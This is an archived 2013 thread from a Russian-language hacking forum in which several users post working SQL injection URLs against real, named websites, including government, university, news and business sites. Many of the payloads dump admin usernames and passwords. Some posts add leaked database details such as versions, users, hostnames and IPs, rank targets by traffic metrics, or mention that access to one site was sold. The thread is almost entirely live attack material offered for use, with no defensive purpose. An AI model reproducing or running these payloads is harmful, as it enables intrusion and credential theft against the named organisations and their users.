View full version: SQL Injections
http://
www.gatewayautogates.com/gate.php?id=41+or+1+group+by+concat((select+versio n()),0x00,floor(rand(0)*2))+having+min(0)--
==========================================
http://
medyal.ru/base.php?id=-30+union+select+1,2,3,group_concat(table_name)+fro m+information_schema.tables+where+table_schema=dat abase()
==========================================
http://
ars36.ru/scutervelo-velo.php?id=-506+union+select+1,2,3,4,version(),6,group_concat( name,0x3a,pass),8,9,10+from+userlist--
==========================================
http://
www.bdbatteries.com/buss-bars.php?id=-300+union+select+1,2,group_concat(table_name),4+fr om+information_schema.tables+where+table_schema=da tabase()--
==========================================
Code:
http://www.witchcraft.nu/newsitem.php?id=-330+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11--
http://
www.esteticaynegocios.com.ar/ver.php?id=-527+union+select+group_concat(username,0x3a,passwo rd),2,3,4+from+foro_username--
==========================================
http://
www.tranzeo.com/investors/press.php?id=133'+or+1+group+by+concat((select+ver sion()),0x00,floor(rand(0)*2))+ having +min(0)+--+
==========================================
http://
www.bna-inc.com/about.press.php?id=59'+or+1+group+by+concat((selec t+version()),0x3a,database(),0x3a,user(),floor(ran d(0)*2))+having+min(0)+--+
==========================================
http://www.gucunparkhotel.com/en/about.php?id=-59+union+select+1,@@version,3,4,5
and
http://www.ipt.com.ua/about.php?id=-59+union+select+version()
http://
www.dmch.edu/HOD.php?id=45'+or+1+group+by+concat((select+versio n()),0x3a,database(),0x3a,user(),floor(rand(0)*2)) +having+min(0) +--+
==========================================
http://
www.geca.ac.in/departments/hod.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user_name,p ass_word),version(),7,8,9 from admin_login--
==========================================
Win32BOT
04.06.2013, 16:15
Code:
http://banki.volgograda.ru/index.php?do=-123+union+select+1,2,user(),database(),5,6,7,8,9,1 0,11,12,13,14,15,version()+--+
Win32BOT
04.06.2013, 18:43
Code:
http://encycl.anthropology.ru/article.php?id=1+union+select+1,user(),version(),d atabase(),5,6,7,8,9,10+--+
Code:
http://www.slavsandtatars.com/about.php?id=-25+union+select+user(),database(),version()+--+
Win32BOT
04.06.2013, 19:02
Code:
http://www.dittberner.com/reports/about.php?id=9999+union+select+1,2,version(),user( ),database(),6,7,8+--+
http://
www.balmoralia.com/conoce-zona.php?id=-3+union+select+group_concat(table_name)+from+infor mation_schema.tables+where+table_schema=database()--
==========================================
http://
www.freizeitkarte.at/gebiet.php?gebiet_id=56+or+1+group+by+conca((selec t+user()),0x3a,version(),0x3a,database(),floor(ran d(0)*2)) +having+min(0) --
==========================================
http://
www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_conca(userpwd,0x3a,user rights),version(),4,5+from+users--
==========================================
http://
www.ablasq.qc.ca/nouvelle.php?id=-62+union+select+1,2,group_concat(0x3a,table_name), 4,5,6,7,8+from+information_schema.tables+where+tab le_schema=database() --
==========================================
http://www.tergos.qc.ca/nouvelle.php?id=-16+union+select+1,2,database(),4,version(),6,7,8,9--
==========================================
Win32BOT
06.06.2013, 02:50
Code:
http://www.pangeaday.org/filmDetail.php?id=-+75+union+select+1,2,3,4,5,6,user(),8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23+--+
TIC 120
http://
www.expoconsta.ru/eng/news.php?nid=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(use r(),0x3a,version(),0x3a,database(),13,14 --
==========================================
http://
www.teberia.pl/news.php?id=-2160+union+select+1,2,version(),group_concat(table _name),5,6+from+information_schema.tables+where+ta ble_schema=database() --
==========================================
Code:
http://www.mof.gov.bt/news/news_detail.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9--
TIC 40
http://
lr4.latvijasradio.lv/post.php?id=62948+or+1+group+by+concat((select+ver sion()),0x3a,user(),0x3a,database(),floor(rand(0)* 2))+having+min(0)
==========================================
TIC 100
http://
www.buran-rus.ru/zap.php?id=-1+union+select+version() --
==========================================
TIC 120
http://
www.parts66.ru/contacts/?id=24+or+1+group+by+concat((select+version()),0x3 a,user(),0x3a,database(),floor(rand(0)*2))+having+ min(0)
==========================================
Улыбайся
10.06.2013, 09:49
http://adminpokrov.57ru.ru/news_view.php?id=-193+union+select+user(),version()--
http://
www.nmmotors.ru/index.php?page=auto_view&id=306'+or+1+group+by+concat((select+version()),0x 3a,user(),0x3a,database(),floor(rand(0)* 2))+having+min(0) --+
==========================================
http://
nifak.ru/index.php?id=10'+or+1+group+by+concat((select+vers ion()),0x3a,user(),0x3a,database(),floor(rand(0)*2 ))+having+min(0) --+
==========================================
Hosting provider, 1200 users
http://
www.genesismuds.com/clients/index.php?id=-490+union+select+1,2,3,4,5,version(),7,8,9,10,grou p_concat(table_name)from information_schema.tables where table_schema= database() --
==========================================
http://
www.yshm.com.cn/component.php?id=-3+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3 --
==========================================
http://
www.customcomputerconcepts.net/component.php?view=-5+union+select+1,version(),concat_ws(0x3a,login,pa ssword),4,5 from dr_adm --
==========================================
http://
www.finmansoftware.co.nz/index.php?id=114%27+union+select+1,2,3,4,group_con cat(table_name),6,7,8,9,10,11,12 from information_schema.tables where%20table_schema=database() --+
==========================================
http://
www.gardencentr.ru/catalog.php?s=-156'+union+select+concat(user(),0x3a,version(),0x3 a,database()) --+
==========================================
http://
www.specialfxcamera.com/content.php?id=-84+union+select+1,group_concat(username,0x3a,passw ord),3 from cms_users--
==========================================
http://
kostagas.ru/content.php?id=-37'+union+all+select+1,version(),group_concat(tabl e_name) from information_schema.tables where table_schema=database() --+
==========================================
http://
www.skpb.ru/content.php?id=-20'+union+all+select+version() --+
==========================================
http://
www.stb01.ru/content.php?id=-3'+union+select+1,version(),3 --+
==========================================
http://
garantkuban.com/content.php?id=-24'+union+select+1,version() --+
==========================================
Guys, no sleeping...
PHP:
http://www.recordmakers.com/artist.php?id=-10+union+select+1,2,3,4,5,6,7,8,9,version(),11,12--+
++$3x++
PHP:
http://zakazdiplom.ru/show_cat.php?subj=-32+union+select+version()--
++$3x++
PHP:
http://www.verav.ru/common/magazin.php?num=-5+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18--
++$3x++
PHP:
http://www.avenuenamericankitchen.com/reviews.php?num=-10+union+select+1,2,3,4,5,6,version(),8,9,10,11,12 ,13,14,15,16--
++$3x++
PHP:
http://www.lesanesagilles.com/fiche-ane.php?NUM=-10+union+select+1,version(),3,4,5,6,7,8--
PHP:
http://www.tourtahlequah.com/business.php?bid=-93+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
++$3x++
PHP:
http://www.bloombaby.ru/collection/main.php?sID=-41+union+select+version()--
++$3x++
PHP:
http://brunswickgp.ru/brunswickgp/viewresults.php?sid=-111+union+select+version(),2,3,4,5--
++$3x++
PHP:
http://tofi.dn.ua/reklama.php?idr=-1+union+select+1,2,3,version()--
++$3x++
PHP:
http://www.sp-antiques.com/web/products.php?c=-5+union+select+1,version(),3--
++$3x++
PHP:
http://www.robotcoupeusa.com/products/product-list.php?c=-5/**/union/**/all/**/select/**/1,concat_ws(user(),database(),version()),3--
Улыбайся
18.06.2013, 11:54
==========================================
http://www.mirloterei.ru/index.php?id=-20'+union+select+1,2,3,database(),@@version,6,7,8+--+
==========================================
Code:
http://bbyloosediamonds.com/pages.php?id=-5+union+select+1,version(),3,4,5,6,7,8,9--
http://
pitaniedetym.ru/content.php?id=-6+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user() ,version(),database()) --
==========================================
http://
akkad.by/s_cat.php?id_part=161+union+select+1,2,3,group_con cat(_name,0x3a,_pas),5,6,7,8 from _akk -- &id_ph=4
==========================================
http://
business-biz.ru/consulting_cat.php?id=-17+union+select+1,group_concat(user,0x3a,pass),3,4 ,5,6 from userlist --
==========================================
http://
gskelit.ru/cat.php?id=-129'+union+all+select+1,2,group_concat(mail,0x3a,f io),4 from mail --+
==========================================
http://
7digit.ru/cat.php?id=-110+or+1+group+by+concat((select+version()),0x3a,u ser(),0x3a,database(),floor(rand(0)*2))+having+min (0) --+
==========================================
http://
carldavey.co.uk/product.php?id=-2/*!union*/+/*!select*/+1,version(),/*!group_concat(table_name)*/,4,5,database(),7,8,9,10 +/*!from*/+/*!information_schema.tables*/+/*!where*/+/*!table_schema=database()*/
==========================================
http://
lightspeedoutdoors.com/product.php?id=-18+union+select+1,version%28%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,group_concat(table_na me) from information_schema.tables where table_schema=database() --+
==========================================
Улыбайся
22.06.2013, 13:08
=================
http://www.plakitina.ru/uroki-risovanija-maslom.php?id=-69+union+select+database()+--+
vulnerable field content=
=================
http://www.trezvie.ru/view_article.php?id=-36'+union+select+1,database(),3,4,5,version()+--+
=================
http://www.wannawin.ru/articles.php?id=-34'+union+select+1,database(),version(),4+--+
=================
http://
www.aircoach.ie/news.article.php?ID=251'+union+select+1,2,3,4,5,ve rsion(),7,8,9,10,11,concat(user,char(58),pass),13, 14,15,16,17,18,19,20 from users --+
==========================================
http://
www.silverfoxseniors.org/news/article.php?id=-11'+union+select+1,version(),group_concat(table_na me),4 from information_schema.tables where table_schema=database() --+
==========================================
http://
www.drusvoice.com/news/article.php?id=-101'+union+select+1,version(),group_concat(table_n ame),4,5 from information_schema.tables where table_schema=database() --+
==========================================
Улыбайся
23.06.2013, 15:21
=================
http://www.numismat.ru/article.shtml?id=-11+union+select+database(),version(),user()+--+
http://www.mrkfish.ru/paper?id=-71+union+select+1,version(),database(),4,5,6+--+
=================
Code:
http://www.kingsarmssalford.com/details.php?show_id=-602+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
The database has a user with the nickname dood, familiar to everyone
http://
allidamaale.com/article.php?id=3736'+union+select+1,2,3,4,version( ),6,7,group_concat(unhex(hex(username)),0x3a,unhex (hex(password))),9 from users +--+
==========================================
Keeping pace with progress
http://
footfuture.net/article.php?id=-27+union+select+1,group_concat(username,0x3a,passw ord),3,version(),5,6 from modx_manager_users --
==========================================
pyatoe.ru
PHP:
http://pyatoe.ru/about/news/?id=151+or+1+group+by+concat%28%28select+version%2 8%29%29,0x00,floor%28rand%280%29*2%29%29having+min %280%29+or+1--+
5.0.92-log
(CY) 10
(PR) 3
==============================================
http://
www.hooknbullet.com
/article.php?id=-1368+or+1+group+by+concat((select+version()),0x3a, user(),0x3a,database(),floor(rand(0)*2))+having+mi n(0)--+
==========================================
http://
www.supercar-news.com
/article.php?id=-139+union+select+1,concat(version(),char(58),datab ase(),char(58),user()) --+
==========================================
alleya.info
PHP:
http://www.alleya.info/pogoda/news_detail.php?id=-9+union+select+1,version%28%29,3,4--+
(CY) 140
(PR) 3
5.5.22
===============================================
http://
tours.ho.ua
/view_article.php?id=-10'+union+select+1,2,3,4,5,group_concat(login,char (58),password),7 from users --+
==========================================
http://
www.upnorthmag.com
/article.php?id=1882+or+1+group+by+concat((select+v ersion()),0x3a,user(),0x3a,database(),floor(rand(0 )*2))+having+min(0)--+
==========================================
http://
www.dtyd.co.za
/news_article.php?id=-15/*!union*//*!select*/1,2,3,version(),/*!group_concat(table_name)*/,6,7/*!from*//*!information_schema.tables*//*!where table_schema=database()*/ --+
==========================================
http://
www.iuc.hr
/conference-details.php?id=212+union+select+concat(version(),0 x3a,user(),0x3a,database()) --
==========================================
Win32BOT
27.06.2013, 02:37
Code:
http://regobraz.ru/statia.php?nm=99999+union+select+1,database(),3,ve rsion(),5,user(),7,8,9+--+
http://
www.tallyimmobilien.be
/detail.php?id=-353+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,group_concat(table_name),15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.tables where table_schema=database() --+
==========================================
http://
www.ipr2.org
/ipsearch/more.php?id=-15+union+all+select+1,version(),group_concat(usern ame,char(58),password),4,5,6,7,8,9,10,11+from+ipr_ user --
==========================================
http://
www.police.gov.bd
/index5.php?category=-186'+union+select+1,version(),3,4,5,6,group_concat (admin_name,char(58),admin_password),8,9+from+admi n--+
==========================================
nemaniak
29.06.2013, 03:27
thehimalayantimes.com PR-6 Alexa-49k
Code:
http://thehimalayantimes.com/featured/year2067/inner_blogs.php?newsid=-125'+UNION+SELECT+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+--+
Code:
5.0.77:himalayan1@localhost:thehimalayantimes_spec ial
http://met-profit.ru/forum/message.php?news=-21297+union+select+1,version(),3,4,5
http://
www.learning.pmi.org
/course-detail.php?id=-2216+union+select+1,group_concat(username,0x3a,pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32+from+cms_u sers -- &pagenum=1
==========================================
http://
www.nickwakeling.org.au
/page.php?id=215'+and+1=2+union+select+1,2,version( ),4,group_concat(table_name),6,7,8+from+informatio n_schema.tables+where+table_schema=database() +--+
==========================================
TIC 950, access has already been sold (https://antichat.live/showthread.php/t/320647/)
http://
www.gipp.ru
/content.php?id=17'+union+select+1,concat(vcLogin,0 x3a,tPassword)+from+tblAdminUser --+
==========================================
http://
www.steptrading.nl
/dev/category.php?id=-240'+union+select+1,version(),3,group_concat(user_ login,0x3a,user_pass),5,6,7,8+from+wp_users--+
==========================================
http://
www.bloggingthemes.com
/template.php?id=-0020+union+select+1,2,concat(database(),0x3a,user( ),0x3a,version()),4,5,6,7--+
==========================================
http://
www.teledom.sk
/template.php?id=-56+union+select+1,concat(database(),0x3a,version() ,0x3a,user()),3,4,5,6,7 -- &idl=97
==========================================
pharm_all
03.07.2013, 17:14
Food!
EDU
http://www-crca.ucsd.edu/views.php?id=5 %SQL%
http://scriptures.byu.edu/gettalk.php?ID=1698 %SQL%
http://www.newsdesk.umd.edu/uniini/release.cfm?ArticleID=2671 %SQL ORACLE%
http://www2.cbe.csueastbay.edu/fac_page/final/index.php?id=308 %SQL%
http://www.salk.edu/insidesalk/articlenph.php?id=131 %SQL%
http://www.lssu.edu/hr/apjobsdesc.php?id=134 %SQL%
Code:
http://www.geospatialhealth.unina.it/main.php?idi=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15--
http://
www.kituku.com
/article_template.php?id=-51'+union+select+1,2,group_concat(table_name),vers ion()+from+information_schema.tables+where+table_s chema=database() --+
==========================================
http://
www.inmobiliariagollan.com.ar
/index.php?id=-167+union+select+1,2,group_concat9table_name),4,5, 6,7,8,9,10,11,12,13+from+information_schema.tables +where+table_schema=0x676f6c6c616e325f646174617364--
==========================================
NeuroZnanie
04.07.2013, 17:42
GET /filter_edit.php?filter_id=1569887%20and%20benchmar k(20000000%2csha1(1))--%20&page_from=filters HTTP/1.1
Host: www.sape.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://www.sape.ru/filters.php
Cookie: {YourCookie}
Win32BOT
04.07.2013, 23:07
Code:
http://www.pushingpetals.com/buy.php?id=999999+union+select+1,user(),database() ,4,5,6,7,8,9,10,11,12+--+
==============================
Code:
http://www.prosto-kredit.ru/next.php?id=9999+union+select+user(),database()+--+
Win32BOT
05.07.2013, 00:44
HTML:
http://rossonka.by/say.php?id=-1558+union+select+1,user(),3,4,5,6,7,8,9,10,11,12, 13,14,15+--+
System User: rossonka_rossony@localhost
Sql Version: 5.0.96-community-cll-lve
Host Name: vh28.hosterby.com
Installation dir: /
Compile OS: unknown-linux-gnu
Current DB: rossonka_rns
DB User: 'rossonka_rossony'@'localhost'
Data Bases: information_schema
rossonka_rns
rossonka_tv
Win32BOT
05.07.2013, 02:09
add inj
Code:
http://www.mciti.ru/box.php?id=-3+union+select+1,user(),database(),version(),5,6,7 ,8,9,10,11+--+
======================================
Code:
ww.tecom.ru/phone.php?id=-1+union+select+1,group_concat(concat_ws(0x3b,user_ name,user_password)),3+from+cpg14x_users+--+
Passwords in plaintext
http://
www.binicilik.org.tr
/news.php?id=369+and+1=2+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,group_concat(username,0x3a, userpass),version(),18,19,20,21+from+users --+
==========================================
http://
www.savorcalifornia.com
/template1.php?id=-196+union+select+1,group_concat(table_name),3,4,5, 6,7,8,9,10,11,12,13,141,5,16,17,18,19,20,21+from+i nformation_schema.tables+where+table_schema=databa se() --+
==========================================
http://
www.jamesgolfestates.com
/propertiestype.php?id=13+and+1=2+union+select+1,2, 3,group_concat(table_name),5+from+information_sche ma.tables+where+table_schema=database() --+
==========================================
Win32BOT
05.07.2013, 17:07
Code:
http://kyivstarstk.com.ua/template.php?id=-437+union+select+1,2,version(),4,5,6,7+--+
Host IP:62.149.9.101
Web Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e proxy_html/3.0.1 proxy_xml/0.1 PHP/5.2.9
Powered-by: PHP/5.2.9
DB Server: MySQL >=5
Sql Version: 5.0.67-log
Current DB: ks_stk
Host Name: i-free.colocall.com
Compile OS: portbld-freebsd7.1
Current User: ks_stk@localhost
Installation dir: /usr/local/
System User: ks_stk@localhost
DB User: 'ks_stk'@'localhost'
Data Bases: information_schema
ks_stk
stat
Win32BOT
05.07.2013, 17:18
Code:
http://humormillnews.com/hmill/read.php?id=-13+union+select+1,2,3,version(),database(),6,7,8,u ser(),group_concat(table_name),11+from+information _schema.tables+where+table_schema=database()+--+
==========================================
Code:
http://www.sourceisrael.com/read.php?id=-104+union+select+1,group_concat(table_name),databa se(),user(),5,6,7,version(),9,10,11+from+informati on_schema.tables+where+table_schema=database()+--+
==========================================
Code:
http://www.dhammaweb.net/Tipitaka/read.php?id=-1+union+select+1,2,database(),user(),version(),6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
==========================================
Code:
http://magla.name/joom/read.php?id=30+union+select+1,2,user(),4,database( ),version(),7,8,9,10,11,12,13,14,15,group_concat(t able_name),17,18,19+from+information_schema.tables +where+table_schema=database()+--+
==========================================
TIC 140 PR 2
Code:
http://www.mzma.net/club/articles/read.php?id=-100+union+select+user(),version(),database(),4,5,g roup_concat(table_name)+from+information_schema.ta bles+where+table_schema=database()+--+
==========================================
Win32BOT
05.07.2013, 22:46
Code:
http://www.epileptologist.ru/contact.php?id=-1+union+select+1,2,user(),database(),group_concat( table_name),6+from+information_schema.tables+where +table_schema=database()+--+
==========================================
Code:
http://www.miss.kg/article.php?cat=-4+union+select+1,database(),3,4,5,6,group_concat(t able_name),8,9,10,11+from+information_schema.table s+where+table_schema=database()+--+
==========================================
Code:
http://www.dors.kz/article.php?id=7+union+select+1,2,database(),user( ),5+--+
Win32BOT
06.07.2013, 00:33
Code:
fikomed.ru/base.php?id=-8+union+select+1,2,database(),group_concat(table_n ame),5+from+information_schema.tables+where+table_ schema=database()+--+
==========================================
TIC 20 PR 1
Code:
http://www.remonthat.ru/article.php?id=-2+union+select+1,2,database(),group_concat(table_n ame),5+from+information_schema.tables+where+table_ schema=database()+--+
Code:
http://www.tidytowns.ie/newsItem.php?id=-330+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),user(),database()),9,10,11,12,13,14--
Win32BOT
06.07.2013, 19:40
Code:
http://americanjewisharchives.org/exhibits/aje/details.php?id=-677+union+select+1,2,3,user(),database(),6,7,8,9,1 0,group_concat(table_name),12,13,14+from+informati on_schema.tables+where+table_schema=database()+--+
http://
www.capequarter.co.za
/details.php?id=-73'+union+select+1,2,group_concat(admin_username,0 x3a,admin_password),4,version(),6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+from+admin_users --+
==========================================
Code:
http://www.stc.gov.ae/en/transport-intercity-routes-result.php?id=-112+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13--
Win32BOT
07.07.2013, 17:16
TIC 20
PR 4
Code:
http://axss.ru/ind.php?pn=2&id_typ=-4+union+select+1,2,3,4,5,user(),group_concat(table _name),8,9,10,11,12,13,14,15,16,database(),18,19,2 0,21+from+information_schema.tables+where+table_sc hema=database()+--+
==========================================
TIC 10
PR 2
Code:
http://board.sdaemkv.ru/ind.php?pn=3&id_categ=-6+union+select+1,2,3,4,5,6,user(),database(),9,10, 11,12,13,14,15,16,17,group_concat(table_name),19,2 0,21,22,23,24,25,26,27,28,29,30+from+information_s chema.tables+where+table_schema=database()+--+
==========================================
Code:
http://board.sbw.in.ua/ind.php?pn=1&id_typ=-165+union+select+1,2,3,4,5,6,user(),group_concat(t able_name),9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64+from+information_schema.t ables+where+table_schema=database()+--+
==========================================
TIC 10
PR 2
Code:
old.sms-kavkaz.ru/ind.php?pn=0&id_categ=-3+union+select+version(),2,3,4,5,6,user(),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
==========================================
P.S.
Lots of SQL injections under inurl:/ind.php?pn=
pharm_all
07.07.2013, 18:40
edu
EDU
http://dueprocesstv.rutgers.edu/episodes.php?id=346 %SQL%
http://www.northsouth.edu/php/faculty/list.php?type=Program&id=2&s_id=1 %SQL%
http://ofa.fas.harvard.edu/cal/loc.php?EventLocation=1 %SQL%
http://extension.oregonstate.edu/catalog/abstract.php?seriesno=2 %SQL%
http://www.financialaid.iastate.edu/scholarships/view.php?id=179 %SQL%
http://kasmana.people.cofc.edu/MATHFICT/mfview.php?callnumber=mf632 %SQL%
http://php.louisville.edu/a-s/cml/french/videos_french/show_video.php?id=10 %SQL%
All of them work; I am not publishing full links for the script kiddies!
Win32BOT
07.07.2013, 19:17
Code:
http://www.dntconsult.kz/news.php?id=-21+union+select+1,database(),group_concat(table_na me),4,user(),6,7+from+information_schema.tables+wh ere+table_schema=database()+--+
Code:
http://www.shrishikshayatanschool.com/whatsnew-4.htm?sec=news&newsid=-153+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4--
Win32BOT
08.07.2013, 00:37
Code:
http://mlmusic.38th.ru/album.phtml?id=-309+union+select+group_concat(table_name),2,databa se()+from+information_schema.tables+where+table_sc hema=database()+--+
==========================================
Code:
http://lel.khv.ru/poems/resultik.phtml?id=-961+union+select+1,database(),user(),group_concat( table_name)+from+information_schema.tables+where+t able_schema=database()+--+
==========================================
Code:
http://promved.ru/articles/article.phtml?id=398&nomer=-15+union+select+1,database(),3,user()+--+
==========================================
TIC 500 PR 5
Code:
http://www.yavlinsky.ru/news/index.phtml?id=-4404+union+select+1,2,3,4,user(),6,7,8,9,10,databa se(),group_concat(table_name),13,14,15,16,17,18,19 ,20,21,version(),23,24,25,26,27,28+from+informatio n_schema.tables+where+table_schema=database()+--+
Win32BOT
08.07.2013, 00:52
TIC 170 PR 4
Code:
http://www.sovazs.com/shownews.phtml?id=-2073+union+select+1,2,3,4,group_concat(table_name) ,database(),7+from+information_schema.tables+where +table_schema=database()+--+
===========================================
Code:
http://foteco.ru/fotoemuls.phtml?id=-17+union+select+1,2,3,database(),group_concat(tabl e_name),6,7,8,9+from+information_schema.tables+whe re+table_schema=database()+--+
http://
www.resolutiondev.com
/content.php?id=-41+union+select+1,2,3,group_concat(username,0x3a,p assword),5,6,7+from+tbl_admin --
==========================================
Gentlemen! Don't forget the anti-repost check (https://www.google.ru/)
Code:
Author: Win32BOT | #15540 (/showpost.php?p=3537121&postcount=15540)
Vulnerable resource: fikomed.ru
repost
12.06.2011, 15:58 (/showpost.php?p=2711412&postcount=13980)
Author: Win32BOT | #15538 (/showpost.php?p=3536886&postcount=15538)
Vulnerable resource: mzma.net
Repost
31.10.2010, 02:10 /showpost.php?p=2409039&postcount=13351
Vulnerable resource: dhammaweb.net
Reposts:
08.12.2012, 00:27 /showpost.php?p=3364494&postcount=15296
23.08.2010, 01:34 /printthread.php?t=21336&page=12806&pp=1
Vulnerable resource: sourceisrael.com
04.12.2011, 21:32 /printthread.php?t=21336&page=14496&pp=1
Author: Win32BOT | #15533 (/showpost.php?p=3536468&postcount=15533)
Vulnerable resource: prosto-kredit.ru
Repost
02.03.2009, 14:35 /showpost.php?p=1145629&postcount=8084
------------------------------------------------------------------------------------------
Author: pharm_all | #15529 (/showpost.php?p=3535574&postcount=15529)
Vulnerable resource: lssu.edu
Reposts:
09.03.2007, 02:03 /printthread.php?t=21336&page=777&pp=1
30.10.2008, 11:06 /showpost.php?p=918180&postcount=6746
28.02.2009, 18:18 /showpost.php?p=1142036&postcount=8041
Vulnerable resource: newsdesk.umd.edu
Reposts:
07.08.2009 13:25 /printthread.php?t=21336&page=10328&pp=1
20.05.2007, 02:04 /showpost.php?p=367105&postcount=2240
30.05.2007, 17:41 /showpost.php?p=376345&postcount=2353
Vulnerable resource: crca.ucsd.edu
Reposts:
01.08.2007, 12:11 /showpost.php?p=426261&postcount=2797
31.05.2007, 02:39 forum.antichat.ru/printthread.php?t=21336&page=2360&pp=1
--------------------------------------------------------------------------------------
Author: YaBtr | #15523 (/showpost.php?p=3531797&postcount=15523)
Vulnerable resource: norcotek.com
Repost:
23.12.2012, 13:04 /showpost.php?p=3378579&postcount=15313
pr 5
http://
www.jewishhistory.org.il
/history.php?id=5874+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,(select(@x)from(select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),16,17,18,19,20,21,22,23 --+
==========================================
pr 2
http://
www.mustangdrive-in.com
/history.php?id=49+union+select+1,2,3,4,5,concat(da tabase(),0x3a,version(),0x3a,user()),7,8,9,10,11,1 2,13%20--
==========================================
Ministry of Energy and Industry of the Kyrgyz Republic
Code:
http://www.energo.gov.kg/site/index.php?act=poll_results&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10--
5.5.24-9-log 'energogovkg'@'%' energogovkg
http://www.6juin1944.com/assaut/amphib.php?id=-11+ union+select+1,2 ,version(),4,5,6,7,8--
5.1.66-0+squeeze1-log
http://www.speedofsound.dk/page.php?id=-11+un ion+select+1, user(),3,4,5,6,7--
MYSQLUSER18783@81.19.232.106
http://www.international.fon.rs/index_en.php?id=-11%20un ion+select+1,2,3,versio n(),5,6,7,8,9--
5.0.77-log
http://www.reklaamivabrik.ee/rus/index.php?subj=-5+union+se lect+1,2,3,4,5,versi on(),7--
5.1.49-log
http://www.persiantunedpiano.com/index.php?subj=-5+union+sel ect+1,2,3,4,5,6,ve rsion(),8--
5.1.53-log
http://www.spectradyn.com/index.php?subj=-5+union+ select+1,2,3,4,ver sion(),6--
5.5.32-log
http://capnbry.net/daoc/mobs.php?z=-10+union+sel ect+versi on()--
5.5.31-0ubuntu0.12.04.2
http://www.alchemypublishers.co.in/book_details.php?bid=-35/**/union/**/select/ **/1,concat_ws(user(),data base(),version())--
alchemdbalchemdb@182.50.130.215.0.96-log
http://www.bayfret.com/band_page.php?b=-10
/**/union/**/select/** /1,2,3, 4,5,concat_ws(user(),data base(),version()),7,8,9, 10,11,12,13,14,15,16,17--
BAYFRETBAYFRET@97.74.215.1955.0.96-LOG
http://www.sanadahoumotsukan.com/facilities/facility.php?n=-10
/**/union/**/select/**/1 ,concat_ws(user(),database(),version()),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19 ,20,21--
aa105k9h7u_utfaa105k9h7u@localhost5.5.14
http://www.sequoia.co.uk/shop/manufacturer_list.php?m=-10/**/union/**/select/**/1,2,3,4,concat_ws(user(),database(),version()),6,7 ,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28--
sequoia_shopsequoia_shop@localhost5.0.96-community
http://www.thesportingclub.com/staff-trainer-detail.php?m=-10/**/union/**/select/**/1,2,3,concat_ws(user(),database(),ve rsion()),5,6,7,8,9 ,10,11,12,13,14,15,16--
db_sdsports_comsdsportsadmin@mysql.tierra.net5.1.6 7-0ubuntu0.10.04.1-log 5, 3
http://www.napauk.org/artist.php?a=-10/**/union/**/sel ect/**/1,concat_ws(use r(),database(),version()),3,4,5,6
hillel845hillel845@10.1.3.1104.1.22
http://www.zohomusic.com/artists.php?a=-10/**/union/**/selec t/**/1,concat_ws(user(),database( ),version()),3,4,5,6,7,8--
zohomusi_zohomusiccomzohomusi_zohomus@localhost5.0 .96-community
http://www.juneauartistsgallery.com/artists.php?a=-10/**/union/**/sele ct/**/1,2,concat_ws(u ser(),database(),version())--
juneau_jagjaguser1@server265.com5.5.31-percona-sure1-log
http://www.powersoft2005.ru/list.php?g=-12/**/union/**/sele ct/**/1,2,concat_ws(user(),database(),v ersion()),4,5--
host1424_2host1424@localhost5.5.20-log
http://www.spectradyn.com/index.php?subj=4+and+1=2+union +select+1,2,3,4,v ersion(),6--
5.5.32-log
http://www.rigikulm.ch/index.php?id=-6+union+select+ 1,version(),3, 4,5--
5.0.21-community-nt
pharm_all
12.07.2013, 06:03
EDU\s
http://www.stanford[dot]edu/group/sjlsp/cgi-bin/orange_web/articles/index.php?CatID=1009 %SQL%
http://library.birzeit[dot]edu/librarya/bzu-ths/show_ths_category_en.php?catid=23%SQL%&src=0&catname=Education
http://help.isu[dot]edu/index.php?action=knowledgebase&catid=38&subcatid=67 %SQL%
http://web3.unt[dot]edu/ielilab/browse.php?catid=8 %SQL%
http://ugcs.caltech[dot]edu/~alexf/tables.php?userID=1 %SQL%
Blaizers
